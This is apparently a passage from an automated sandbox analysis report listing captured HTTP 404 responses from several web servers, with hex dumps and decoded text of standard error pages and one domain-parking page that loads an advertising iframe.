0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:28 GMTContent-Type: text/htmlContent-Length: 867Connection: keep-aliveServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:28 GMTServer: ApacheTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 10File not found.0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Fri, 01 Dec 2023 22:09:27 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:28 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:28 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sat, 02 Dec 2023 01:09:28 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sat, 02 Dec 2023 01:09:28 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:28 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Fri, 01 Dec 2023 22:09:27 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sat, 02 Dec 2023 01:09:28 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:28 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
